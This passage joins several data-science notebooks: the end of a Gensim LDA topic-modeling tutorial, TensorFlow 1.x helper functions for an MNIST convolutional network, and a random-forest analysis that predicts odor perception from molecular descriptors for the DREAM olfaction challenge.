training). Otherwise, # | run batch LDA, updating model only once at the end of each full corpus pass. # | # | `alpha` and `eta` are hyperparameters that affect sparsity of the document-topic # | (theta) and topic-word (lambda) distributions. Both default to a symmetric # | 1.0/num_topics prior. 
# |
# | `alpha` can be set to an explicit array = prior of your choice. It also
# | support special values of 'asymmetric' and 'auto': the former uses a fixed
# | normalized asymmetric 1.0/topicno prior, the latter learns an asymmetric
# | prior directly from your data.
# |
# | `eta` can be a scalar for a symmetric prior over topic/word
# | distributions, or a matrix of shape num_topics x num_words,
# | which can be used to impose asymmetric priors over the word
# | distribution on a per-topic basis. This may be useful if you
# | want to seed certain topics with particular words by boosting
# | the priors for those words.
# ```
#
# So, now you know how to define the number of topics and the number of sampling iterations as well. A higher number of iterations will probably yield a better model, but also increases processing time. `alpha`, `eta` and `random_state` are so-called *hyperparameters*. They influence the model's performance, so feel free to play around with them. In the present example, we will leave the default values. Furthermore, there exist various methods for hyperparameter optimization, e.g. gridsearch or Gaussian optimization.
#
# **Warning: This step can take quite a while!** Meaning something between some seconds and some hours depending on corpus size and the number of iterations. Our example corpus should be done within a minute or two at `iterations=1000`.

# +
# %%time
model = LdaMulticore(corpus=gensim_corpus, id2word=type2id, num_topics=10, passes=10, iterations=1000)
# -

# ### 2.3. Create document-topic matrix
#
# The generated model object can now be translated into a human-readable document-topic matrix (that is actually a pandas `DataFrame`) that constitutes our principal exchange format for topic modeling results. For generating the matrix from a Gensim model, we can use the following function:

topics = postprocessing.show_topics(model=model)
topics

# ## 3.
Model visualization

# Each topic has a certain probability for each document in the corpus (have a look at the cell below). These probability distributions are visualized in an interactive **heatmap** (the darker the color, the higher the probability) which displays the kind of information that is presumably most useful to literary scholars. Going beyond pure exploration, this visualization can be used to show thematic developments over a set of texts as well as a single text, akin to a dynamic topic model. What might become apparent here is that some topics correlate highly with a specific author or group of authors, while other topics correlate highly with a specific text or group of texts.

document_topics = postprocessing.show_document_topics(topics=topics, model=model, document_labels=meta['title'], doc2bow=gensim_corpus)
document_topics[:5]

# ### 3.1. Distribution of topics

# #### Distribution of topics over all documents
#
# The distribution of topics over all documents can now be visualized in a heat map.

from bokeh.io import output_notebook, show
output_notebook()

# %matplotlib inline
PlotDocumentTopics = visualization.PlotDocumentTopics(document_topics)

show(PlotDocumentTopics.interactive_heatmap(), notebook_handle=True)

# Or a static heatmap:

static_heatmap = PlotDocumentTopics.static_heatmap()
static_heatmap.show()
notebooks/IntroducingGensim.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import tensorflow as tf

# Helper functions for building a small TF1 (graph-mode) convnet for MNIST.
# NOTE(review): this code targets the TensorFlow 1.x API (tf.contrib,
# tf.truncated_normal, graph/name scopes) and will not run under TF 2.x
# without tf.compat.v1 — confirm the intended TF version.
#helper_functions
#________________________________________________


def weight_variable(shape):
    '''
    Initialize weights
    :param shape: shape of weights, e.g. [w, h ,Cin, Cout] where
    w: width of the filters
    h: height of the filters
    Cin: the number of the channels of the filters
    Cout: the number of filters
    :return: a tensor variable for weights with initial values
    '''
    # Truncated normal keeps initial weights within 2 stddevs of 0.
    # NOTE(review): mnist_inference below does not call this helper — it uses
    # tf.get_variable with a Xavier initializer instead; kept for external users.
    initial_W = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(initial_W)


def bias_variable(shape):
    '''
    Initialize biases
    :param shape: shape of biases, e.g. [Cout] where
    Cout: the number of filters
    :return: a tensor variable for biases with initial values
    '''
    # Small positive constant avoids dead ReLU units at initialization.
    initial_b = tf.constant(0.1, shape=shape)
    return tf.Variable(initial_b)


def conv2d(x, W):
    '''
    Perform 2-D convolution
    :param x: input tensor of size [N, W, H, Cin] where
    N: the number of images
    W: width of images
    H: height of images
    Cin: the number of channels of images
    :param W: weight tensor [w, h, Cin, Cout]
    w: width of the filters
    h: height of the filters
    Cin: the number of the channels of the filters = the number of channels of images
    Cout: the number of filters
    :return: a tensor of features extracted by the filters, a.k.a. the results after convolution
    '''
    # Stride 1 in every dimension + 'SAME' padding preserves spatial size.
    h_conv = tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
    return h_conv


def max_pool_2x2(x):
    '''
    Perform non-overlapping 2-D maxpooling on 2x2 regions in the input data
    :param x: input data
    :return: the results of maxpooling (max-marginalized + downsampling)
    '''
    # ksize == strides == 2x2 => non-overlapping pooling, halves W and H.
    h_max = tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
    return h_max


#counting the total number of parameters in our network
def param_counter():
    # Sums the element counts of all trainable variables in the default graph
    # and prints the total; call after the graph has been built.
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total number of parameters:", total_parameters)


def mnist_inference(x_image, y_, keep_prob, nh1, nh2, nh3, num_classes):
    # Build a 2-conv-layer + 1-FC-layer classifier graph for 28x28 grayscale
    # images (two 2x2 poolings => the 7*7 flatten below assumes 28x28 input).
    # :param x_image: input batch, expected [N, 28, 28, 1]
    # :param y_: one-hot labels, [N, num_classes]
    # :param keep_prob: dropout keep probability (placeholder or scalar)
    # :param nh1, nh2: number of filters in conv layers 1 and 2
    # :param nh3: number of units in the fully-connected layer
    # :param num_classes: number of output classes
    # :return: (logits, cross-entropy loss, per-example correctness, accuracy)
    # first convolutional layer
    #nh1 = 32
    input_channels = 1
    with tf.name_scope('conv1'):
        W_conv1 = tf.get_variable('W_conv1', shape = [5, 5, input_channels, nh1], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
        b_conv1 = bias_variable([nh1])
        h_conv1 = conv2d(x_image, W_conv1) + b_conv1
        # NOTE(review): batch_norm here uses its default training behavior;
        # no is_training flag is threaded through — confirm for eval/inference.
        h_bnorm1= tf.contrib.layers.batch_norm(h_conv1, epsilon=1e-5, scope='bn1')
        h_act1 = tf.nn.relu(h_bnorm1)
    with tf.name_scope('conv1_output'):
        h_pool1 = max_pool_2x2(h_act1)
    # second convolutional layer
    #nh2 = 64
    with tf.name_scope('conv2'):
        W_conv2 = tf.get_variable('W_conv2', shape = [5, 5, nh1, nh2], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
        b_conv2 = bias_variable([nh2])
        h_conv2 = conv2d(h_pool1, W_conv2) + b_conv2
        h_bnorm2= tf.contrib.layers.batch_norm(h_conv2, epsilon=1e-5, scope='bn2')
        h_act2 = tf.nn.relu(h_bnorm2)
    with tf.name_scope('conv2_output'):
        h_pool2 = max_pool_2x2(h_act2)
    # densely connected layer
    #nh3 = 1024
    with tf.name_scope('fc1'):
        # 7*7 spatial size follows from 28x28 input halved twice by pooling.
        W_fc1 = tf.get_variable('W_fc1', shape = [7 * 7 * nh2, nh3], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
        b_fc1 = bias_variable([nh3])
        h_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * nh2])
    with tf.name_scope('fc1_output'):
        h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
    # dropout
    with tf.name_scope('dropout'):
        with tf.name_scope('dropout_output'):
            h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
    # softmax
    #num_classes = 10
    with tf.name_scope('fc2'):
        W_fc2 = tf.get_variable('W_fc2', shape =[nh3, num_classes], initializer = tf.contrib.layers.xavier_initializer(), dtype=tf.float32)
        b_fc2 = bias_variable([num_classes])
    with tf.name_scope('net_output'):
        # Raw logits; softmax is applied inside the loss op below.
        y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
    #loss function
    with tf.name_scope('loss'):
        # NOTE(review): softmax_cross_entropy_with_logits (v1) is deprecated in
        # favor of the _v2 variant; behavior is identical when labels are
        # constants, as here.
        cross_entropy = tf.reduce_mean(
            tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))
    #correct_predictions and accuracy
    with tf.name_scope('predictions'):
        correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))
        correct_prediction = tf.cast(correct_prediction, tf.float32)
    with tf.name_scope('accuracy'):
        accuracy = tf.reduce_mean(correct_prediction)
    return (y_conv, cross_entropy, correct_prediction, accuracy)
# -
mnist_helper_functions.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# ### Preliminaries

# +
# Show all figures inline.
# %matplotlib inline

# Add olfaction-prediction to the Python path.
# NOTE(review): assumes the notebook is run from two levels below the project
# root — confirm working directory before running.
import os
import sys
curr_path = os.getcwd()
gerkin_path = os.path.split(curr_path)[0]
olfaction_prediction_path = os.path.split(gerkin_path)[0]
sys.path.append(olfaction_prediction_path)
import opc_python

# Import numerical libraries.
import numpy as np
from matplotlib.pyplot import plot

# +
# Import generic utility modules I wrote to load the data from the tab-delimited text files and to score predictions.
from opc_python.utils import loading, scoring

# Import the modules I wrote for actually shaping and fitting the data to the model.
from opc_python.gerkin import dream,fit1,params
from opc_python.gerkin.fit1 import rfc_cv
# -

# Load the perceptual descriptors data.
perceptual_headers, perceptual_obs_data = loading.load_perceptual_data('training')

loading.format_leaderboard_perceptual_data()

# Show the perceptual metadata types and perceptual descriptor names.
print(perceptual_headers)

# Show the metadata and perceptual descriptor values for the first compound.
print(perceptual_obs_data[1])

# First 6 header columns are metadata; the rest are descriptor names.
num_descriptors = len(perceptual_headers[6:])
num_subjects = 49
print('There are %d different perceptual descriptors and %d different subjects' % (num_descriptors,num_subjects))

# Load the molecular descriptors data.
molecular_headers, molecular_data = loading.load_molecular_data()
print("First ten molecular descriptor types are %s" % molecular_headers[:10])
print("First ten descriptor values for the first compound are %s" % molecular_data[0][:10])

total_size = len(set([int(row[0]) for row in molecular_data]))
print("We have molecular descriptors for %d unique molecules" % total_size)

training_size = len(set([int(row[0]) for row in perceptual_obs_data]))
print("We have perceptual data for %d unique molecules" % training_size)

remaining_size = total_size - training_size
print ("%d are left out for testing in the competition; half of these (%d) are used for the leaderboard." \
    % (remaining_size,remaining_size/2))

print("There are %d rows in the perceptual data set (at least one for each subject and molecule)" % len(perceptual_obs_data))

print("%d of these are replicates (same subject and molecules)" % sum([x[2] for x in perceptual_obs_data]))

# Sorted list of all compound IDs across the three data splits; index into this
# list is used as the row index for the auxiliary feature matrices below.
all_CIDs = sorted(loading.get_CIDs('training')+loading.get_CIDs('leaderboard')+loading.get_CIDs('testset'))

# NOTE(review): hard-coded user-specific path — parameterize before sharing.
DATA = '/Users/rgerkin/Dropbox/science/olfaction-prediction/data/'
import pandas

# EPI Suite physicochemical descriptors; column 49 is a YES/NO flag encoded 0/1.
episuite = pandas.read_table('%s/DREAM_episuite_descriptors.txt' % DATA)
episuite.iloc[:,49] = 1*(episuite.iloc[:,49]=='YES ')
episuite.iloc[:,49]
# NOTE(review): DataFrame.as_matrix() is deprecated/removed in newer pandas;
# .values or .to_numpy() is the modern equivalent.
episuite = episuite.iloc[:,2:].as_matrix()
episuite.shape

# Chemical-name-derived ("verbal") features; first column is an identifier.
verbal = pandas.read_table('%s/name_features.txt' % DATA, sep='\t', header=None)
verbal = verbal.as_matrix()[:,1:]
verbal.shape

# Morgan fingerprint similarity matrix.
morgan = pandas.read_csv('%s/morgan_sim.csv' % DATA)
morgan = morgan.as_matrix()[:,1:]
morgan.shape

# Parse the NSPDK graph-kernel features from a sparse libsvm-style file:
# one line per molecule (in all_CIDs order), "feature:value" pairs after the label.
with open('%s/derived/nspdk_r3_d4_unaug.svm' % DATA) as f:
    nspdk_dict = {}
    i = 0
    while True:
        x = f.readline()
        if(len(x)):
            key_vals = x.split(' ')[1:]
            for key_val in key_vals:
                key,val = key_val.split(':')
                if key in nspdk_dict:
                    nspdk_dict[key][all_CIDs[i]] = val
                else:
                    nspdk_dict[key] = {all_CIDs[i]:val}
            i+=1
            if i == len(all_CIDs):
                break
        else:
            break
# Keep only features observed for more than one molecule.
nspdk_dict = {key:value for key,value in nspdk_dict.items() if len(value)>1}
# Densify into a (molecules x features) matrix.
nspdk = np.zeros((len(all_CIDs),len(nspdk_dict)))
for j,(feature,facts) in enumerate(nspdk_dict.items()):
    for CID,value in facts.items():
        i = all_CIDs.index(CID)
        nspdk[i,j] = value
nspdk.shape

# Precomputed NSPDK Gramian (kernel) matrix, truncated to the known CIDs.
nspdk_gramian = pandas.read_table('%s/derived/nspdk_r3_d4_unaug_gramian.mtx' % DATA, delimiter=' ', header=None)
nspdk_gramian = nspdk_gramian.as_matrix()[:len(all_CIDs),:]
nspdk_gramian.shape

# Build one feature set per combination of descriptor sources; each starts from
# a copy of the Dragon rows and appends the auxiliary features per molecule.
molecular_data_types = ['dragon','dragon+episuite','dragon+verbal','dragon+morgan', 'dragon+nspdk','dragon+nspdk_gramian','dragon+all']
molecular_data = {mdt:molecular_data.copy() for mdt in molecular_data_types}
for i,line in enumerate(molecular_data['dragon']):
    CID = int(line[0])
    index = all_CIDs.index(CID)
    molecular_data['dragon+episuite'][i] = line + list(episuite[index])
    molecular_data['dragon+verbal'][i] = line + list(verbal[index])
    molecular_data['dragon+morgan'][i] = line + list(morgan[index])
    molecular_data['dragon+nspdk'][i] = line + list(nspdk[index])
    molecular_data['dragon+nspdk_gramian'][i] = line + list(nspdk_gramian[index])
    molecular_data['dragon+all'][i] = line + list(episuite[index]) + list(morgan[index]) + list(nspdk[index]) + list(nspdk_gramian[index])

# ### Create Molecular Matrix

# Build design matrices for each split; good1/good2/means/stds fitted on the
# training split are reused for the other splits so scaling is consistent.
X_training = {mdt:None for mdt in molecular_data_types}
X_leaderboard_other = {mdt:None for mdt in molecular_data_types}
X_leaderboard_int = {mdt:None for mdt in molecular_data_types}
X_testset_other = {mdt:None for mdt in molecular_data_types}
X_testset_int = {mdt:None for mdt in molecular_data_types}
X_all = {mdt:None for mdt in molecular_data_types}
for mdt in molecular_data_types:
    X_training[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"training")
    X_leaderboard_other[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"leaderboard",target_dilution='high',good1=good1,good2=good2,means=means,stds=stds)
    X_leaderboard_int[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"leaderboard",target_dilution=-3,good1=good1,good2=good2,means=means,stds=stds)
    X_testset_other[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"testset",target_dilution='high',good1=good1,good2=good2,means=means,stds=stds)
    X_testset_int[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],"testset",target_dilution=-3,good1=good1,good2=good2,means=means,stds=stds)
    X_all[mdt],good1,good2,means,stds,imputer = dream.make_X(molecular_data[mdt],['training','leaderboard'],good1=good1,good2=good2,means=means,stds=stds)

# Observed perceptual targets under several imputation strategies.
Y_training_imp,imputer = dream.make_Y_obs('training',target_dilution=None,imputer='median')
Y_training_mask,imputer = dream.make_Y_obs('training',target_dilution=None,imputer='mask')
Y_leaderboard,imputer = dream.make_Y_obs('leaderboard',target_dilution='gold',imputer='mask')
Y_leaderboard_noimpute,_ = dream.make_Y_obs('leaderboard',target_dilution='gold',imputer=None)
Y_all_imp,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='median')
Y_all_mask,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='mask')
Y_all_zero,imputer = dream.make_Y_obs(['training','leaderboard'],target_dilution=None,imputer='zero')

import matplotlib.pyplot as plt
# Columns 0..20 are descriptor means; 21..41 the corresponding stdevs.
plt.scatter(Y_all_mask['mean_std'][:,0],Y_all_mask['mean_std'][:,21])

# ### Data preparation

# Show the range of values for the molecular and perceptual descriptors.
plt.hist(X_training['dragon+all'].ravel())
plt.yscale('log')
plt.ylabel('Count')
plt.xlabel('Cube root transformed, N(0,1) normalized molecular descriptor values')

plt.figure()
plt.hist(Y_training_imp['mean_std'][:21].ravel())
plt.yscale('log')
plt.ylabel('Count')
_ = plt.xlabel('Perceptual descriptor subject-averaged values')

# ## Fitting and Generating Submission Files

from sklearn.ensemble import RandomForestRegressor,ExtraTreesRegressor
# NOTE(review): sklearn.cross_validation was removed in scikit-learn 0.20;
# modern code imports ShuffleSplit from sklearn.model_selection.
from sklearn.cross_validation import ShuffleSplit

n_obs = len(Y_training_imp['mean_std'])

# How much should subjected be pooled for estimating individual subjects' responses?
n_estimators_list = [5,18,50,150]
# NOTE(review): the initialization of `rfcs` is commented out below, so this
# cell raises NameError on a fresh kernel — it relies on `rfcs` surviving from
# a previous notebook session.
#rfcs = {subject:[None for _ in range(len(n_estimators_list))] for subject in range(1,50)}
X = X_all['dragon+all']
Y = Y_all_imp['subject']
for subject in range(1,50):
    for i,n_estimators in enumerate(n_estimators_list):
        # Only fit the largest forest size (i == 3); smaller ones were fit earlier.
        if i<3:
            continue
        print(subject,n_estimators)
        rfcs[subject][i] = RandomForestRegressor(n_estimators=n_estimators,max_features=None,min_samples_leaf=1, max_depth=None,oob_score=True,n_jobs=-1,random_state=0)
        rfcs[subject][i].fit(X,Y[subject])

# For each descriptor (col), scan the pooling weight `a` that blends the
# across-subject pooled OOB prediction with each subject's own prediction,
# and plot the resulting mean correlation per forest size.
fig,axes = plt.subplots(7,3,sharex=True,sharey=True,figsize=(10,12))
a_list = np.linspace(0.01,0.99,35)
for col,ax in enumerate(axes.flat):
    rs = np.zeros((35,len(n_estimators_list)))
    x_max = np.zeros(len(n_estimators_list))
    y_max = np.zeros(len(n_estimators_list))
    for i,n_estimators in enumerate(n_estimators_list):
        prediction_pooled = np.zeros(rfcs[1][i].oob_prediction_.shape)
        for subject in range(1,50):
            prediction = rfcs[subject][i].oob_prediction_
            prediction_pooled += prediction
        prediction_pooled /= subject
        for j,a in enumerate(a_list):
            r = 0
            denom = 0
            for subject in range(1,50):
                observation = Y[subject][:,col]
                prediction = rfcs[subject][i].oob_prediction_[:,col]
                prediction_weighted = a*prediction_pooled[:,col] + (1-a)*prediction
                # Skip NaN correlations (e.g. constant observation vectors).
                r_ = np.corrcoef(prediction_weighted,observation)[0,1]
                if not np.isnan(r_):
                    r += r_
                    denom += 1
            r /= denom
            rs[j,i] = r
        #print(col,rs)
        ax.plot(a_list,rs[:,i],color=['r','g','b','c'][i])
        x_max[i] = a_list[np.argmax(rs[:,i])]
        y_max[i] = np.amax(rs[:,i])
    ax.plot(x_max,y_max,color='k')

import pickle
# NOTE(review): hard-coded user-specific output path.
with open('/Users/rgerkin/Desktop/rfcs1_oob.pickle','wb') as f:
    pickle.dump(rfcs,f)

rfcs[18][i].__dict__

# When do we want ExtraTrees instead of the usual RandomForest?
n_splits = 10
results = np.zeros((42,2,n_splits))
shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0)
for col in range(42):
    rfc = RandomForestRegressor(n_estimators=20,max_features=None,min_samples_leaf=1, max_depth=None,oob_score=False,n_jobs=-1,random_state=0)
    etc = ExtraTreesRegressor(n_estimators=20,max_features=None,min_samples_leaf=1, max_depth=None,n_jobs=-1,random_state=0)
    for j,(train,test) in enumerate(shuffle_split):
        for i,estimator in enumerate([etc,rfc]):
            X = X_all['dragon+all']
            observed = Y_all_mask['mean_std'][:,col]
            estimator.fit(X[train,:],observed[train])
            predicted = estimator.predict(X[test,:])
            results[col,i,j] = np.corrcoef(predicted,observed[test])[1,0]
    means = results[col,:,:].mean(axis=1)
    sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits)
    print('Desc. %d: [%.3f +/- %.3f], [%.3f +/- %.3f]' % \
        (col,means[0],sems[0],means[1],sems[1]))
# Answer: Probably only for intensity.

means = results[:,:,:].mean(axis=2)
sems = results[:,:,:].std(axis=2)/np.sqrt(n_splits)
plt.plot(means[:,0] - means[:,1])
plt.xlabel("Descriptor #")
plt.ylabel("ETC - RFC")

# How does performance increase with the number of features?
n_splits = 3
n_features = [10,33,100,333,1000,3333,13914]
results = np.zeros((42,len(n_features),n_splits))
shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0)
for col in range(42):
    for i,max_features in enumerate(n_features):
        rfc = RandomForestRegressor(n_estimators=100,max_features=max_features,min_samples_leaf=1, max_depth=None,oob_score=False,n_jobs=-1,random_state=0)
        for j,(train,test) in enumerate(shuffle_split):
            X = X_all['dragon+all']
            observed = Y_all_mask['mean_std'][:,col]
            rfc.fit(X[train,:],observed[train])
            predicted = rfc.predict(X[test,:])
            results[col,i,j] = np.corrcoef(predicted,observed[test])[1,0]
        means = results[col,:,:].mean(axis=1)
        sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits)
    print(('Desc. %d:'+len(n_features)*' [%.3f],') % \
        tuple([col]+[means[i] for i in range(len(n_features))]))

# One correlation-vs-#features panel per descriptor.
fig,ax = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20))
for col in range(42):
    ax_ = ax[int(col / 3), col % 3]
    ax_.errorbar(n_features,results[col,:,:].mean(axis=1),results[col,:,:].std(axis=1)/np.sqrt(n_splits))
    ax_.set_xlim(5,15000)
    ax_.set_ylim(0,0.8)
    ax_.set_yticks(np.linspace(0,0.6,4))
    #ax_.set_xticklabels(n_features,rotation=45)
    ax_.set_xscale('log')
    ax_.set_title('Feature %d' % col)
plt.tight_layout()
fig.text(0.5, 0.00, '# features', ha='center')
fig.text(0.00, 0.5, 'Correlation', va='center', rotation='vertical')

# Does having more samples per leaf or less depth help?
n_splits = 12
n_samples_leaf = [1,4,16,64]
n_depth = [2,6,15,32,None]
# NOTE(review): `results` init is commented out, so this cell relies on the
# 4-D `results` array from a previous session (NameError / shape mismatch on
# a fresh kernel).
#results = np.zeros((42,len(n_samples_leaf),len(n_depth),n_splits))
shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0)
for col in range(3,42):
    for i,min_samples_leaf in enumerate(n_samples_leaf):
        for j,max_depth in enumerate(n_depth):
            rfc = RandomForestRegressor(n_estimators=25,max_features=None, min_samples_leaf=min_samples_leaf, max_depth=max_depth,oob_score=False, n_jobs=-1,random_state=0)
            X = X_all['dragon+all']
            Y = Y_all_mask['mean_std'][:,col]
            for k,(train,test) in enumerate(shuffle_split):
                observed = Y[test]
                rfc.fit(X[train,:],Y[train])
                predicted = rfc.predict(X[test,:])
                results[col,i,j,k] = np.corrcoef(predicted,observed)[1,0]
            mean = results[col,i,j,:].mean()
            sem = results[col,i,j,:].std()/np.sqrt(n_splits)
            print('Feature %d: %s min samples per leaf, %s max depth: %.3f +/- %.3f' % (col,min_samples_leaf,max_depth,mean,sem))

import pickle
with open('data.pickle','wb') as f:
    pickle.dump(results,f)

results2[:,0,3]

# +
# Z-score each (leaf, depth) condition against the default condition
# (min_samples_leaf=1, max_depth=None, i.e. index [0, 4]).
results2 = results - np.tile(results[:,0:1,4:5,:],(1,4,5,1)) # Subtract the no max depth, no min sample condition.
results2 = results2[:,:,:,:n_splits] # Only 12 splits used.
results2 = results2.mean(axis=3) / (results2.std(axis=3)/np.sqrt(n_splits))
results2[np.where(np.isnan(results2))] = 0
fig,axes = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20))
for col,ax in enumerate(axes.flat):
    im = ax.pcolormesh(results2[col,:,:],vmin=-5,vmax=5,cmap='RdBu')
    ax.set_xticks(np.arange(5)+0.5)
    ax.set_xticklabels(n_depth)
    ax.set_yticks(np.arange(4)+0.5)
    ax.set_yticklabels(n_samples_leaf)
    ax.set_title('Feature %d' % col)
cbar_ax = fig.add_axes([1.05, 0.15, 0.05, 0.7])
cbar_ax.set_xlabel('Z-Score for correlation vs default condition')
plt.colorbar(im, cax=cbar_ax)
fig.text(0.5, -0.02, 'max_depth', ha='center')
fig.text(-0.02, 0.5, 'min_samples_leaf', va='center', rotation='vertical')
plt.tight_layout()
# -

np.where(np.isnan(results2))

import matplotlib.pyplot as plt
# Same grid, but raw correlation relative to the best condition per feature.
fig,axes = plt.subplots(14,3,sharex=True,sharey=True,figsize=(10,20))
for col,ax in enumerate(axes.flat):
    im = ax.pcolormesh(results[col,:,:,:].mean(axis=2)-results[col,:,:,:].mean(axis=2).max(),vmin=-0.3,vmax=0.0,cmap='gray')
    ax.set_xticks(np.arange(5)+0.5)
    ax.set_xticklabels(n_depth)
    ax.set_yticks(np.arange(4)+0.5)
    ax.set_yticklabels(n_samples_leaf)
    ax.set_title('Feature %d' % col)
cbar_ax = fig.add_axes([1.05, 0.15, 0.05, 0.7])
cbar_ax.set_xlabel('Correlation - \nBest Correlation')
plt.colorbar(im, cax=cbar_ax)
fig.text(0.5, -0.02, 'max_depth', ha='center')
fig.text(-0.02, 0.5, 'min_samples_leaf', va='center', rotation='vertical')
plt.tight_layout()

# Now we focus just on max_depth?
n_splits = 10
n_depth = [2,5,8,12,16,25,None]
results = np.zeros((42,len(n_depth),n_splits))
shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0)
for col in range(42):
    for j,max_depth in enumerate(n_depth):
        rfc = RandomForestRegressor(n_estimators=10,max_features=None, min_samples_leaf=1, max_depth=max_depth,oob_score=False, n_jobs=-1,random_state=0)
        X = X_all['dragon+all']
        Y = Y_all_mask['mean_std'][:,col]
        for k,(train,test) in enumerate(shuffle_split):
            observed = Y[test]
            rfc.fit(X[train,:],Y[train])
            predicted = rfc.predict(X[test,:])
            results[col,j,k] = np.corrcoef(predicted,observed)[1,0]
    means = results[col,:,:].mean(axis=1)
    sems = results[col,:,:].std(axis=1)/np.sqrt(n_splits)
    print(('Desc. %d:'+len(n_depth)*' [%.3f],') % \
        tuple([col]+[means[i] for i in range(len(n_depth))]))

# Visualizing the dependence on n_depth
plt.figure(figsize=(9,7))
plt.pcolormesh(results.mean(axis=2) - np.tile(results.mean(axis=2).max(axis=1),(7,1)).T, vmin=-0.2, vmax=0.0)
plt.xticks(np.arange(len(n_depth))+0.5,n_depth)
plt.yticks(np.arange(42)+0.5,np.arange(42))
plt.ylim(0,42)
plt.ylabel('Feature #')
plt.set_cmap('gray')
ax = plt.colorbar()
ax.set_label('Correlation - \nBest Correlation')

plt.figure()
# Map max_depth=None to 100 so it can sit on a log-scaled x axis.
n_depth_ = [_ if _ is not None else 100 for _ in n_depth]
plt.plot(n_depth_,results[:,:,:].mean(axis=2).T)
plt.xscale('log')
plt.xlabel('Max Features')
plt.ylabel('Correlation')
_ = plt.xlim(2,100)

# +
def f_transformation(x, k0=1.0, k1=1.0):
    # Parametric map from a descriptor mean (0..100) to a predicted stdev:
    # a difference of two power laws, zero at x=0 and x=100.
    return 100*(k0*(x/100)**(k1*0.5) - k0*(x/100)**(k1*2))

def sse(x, mean, stdev):
    # Sum-of-squared-errors objective for fitting (k0, k1) = x to the
    # observed mean->stdev relationship.
    predicted_stdev = f_transformation(mean, k0=x[0], k1=x[1])
    #predicted_mean = f_transformation2(predicted[i], k0=x[0], k1=x[1], k2=x[2])
    sse = np.sum((predicted_stdev - stdev)**2)
    return sse

# Fit (k0, k1) per descriptor and store in f_coefs[col] as res.x = [k0, k1].
fig,axes = plt.subplots(7,3,figsize=(7,12))
ax = axes.flat
f_coefs = {col:None for col in range(21)}
from scipy.optimize import minimize
for col in range(len(ax)):
    Y_mean = Y_all_mask['mean_std'][:,col]
    Y_stdev = Y_all_mask['mean_std'][:,col+21]
    x = [1.0,1.0]
    res = minimize(sse, x, args=(Y_mean,Y_stdev), method='L-BFGS-B')
    print(col,res.x)
    f_coefs[col] = res.x
    ax[col].scatter(Y_mean,Y_stdev,s=0.1)
    x_ = np.linspace(0,100,100)
    ax[col].plot(x_,f_transformation(x_, k0=res.x[0], k1=res.x[1]))#, k2=res.x[2]))
# -

# +
# Balance between directly fitting stdev and applying a function to the fit of the mean.
n_splits = 10
shuffle_split = ShuffleSplit(n_obs,n_splits,test_size=0.2,random_state=0)
# NOTE(review): these inits are commented out — the fitting loop below relies
# on predictions_mean / predictions_stdev persisting from a prior session.
#predictions_mean = {i:[None]*n_splits for i in range(21)}
#predictions_stdev = {i:[None]*n_splits for i in range(21)}
for col in range(21):
    X = X_all['dragon+all']
    Y_mean = Y_all_mask['mean_std'][:,col]
    Y_stdev = Y_all_mask['mean_std'][:,col+21]
    for k,(train,test) in enumerate(shuffle_split):
        print(col,k)
        rfc_mean = RandomForestRegressor(n_estimators=30,max_features=None, min_samples_leaf=1, max_depth=None, n_jobs=-1,random_state=0)
        rfc_stdev = RandomForestRegressor(n_estimators=30,max_features=None, min_samples_leaf=1, max_depth=None, n_jobs=-1,random_state=0)
        rfc_mean.fit(X[train,:],Y_mean[train])
        rfc_stdev.fit(X[train,:],Y_stdev[train])
        predictions_mean[col][k] = rfc_mean.predict(X[test,:])
        predictions_stdev[col][k] = rfc_stdev.predict(X[test,:])
# -

# +
# Balance between directly fitting stdev and applying a function to the fit of the mean.
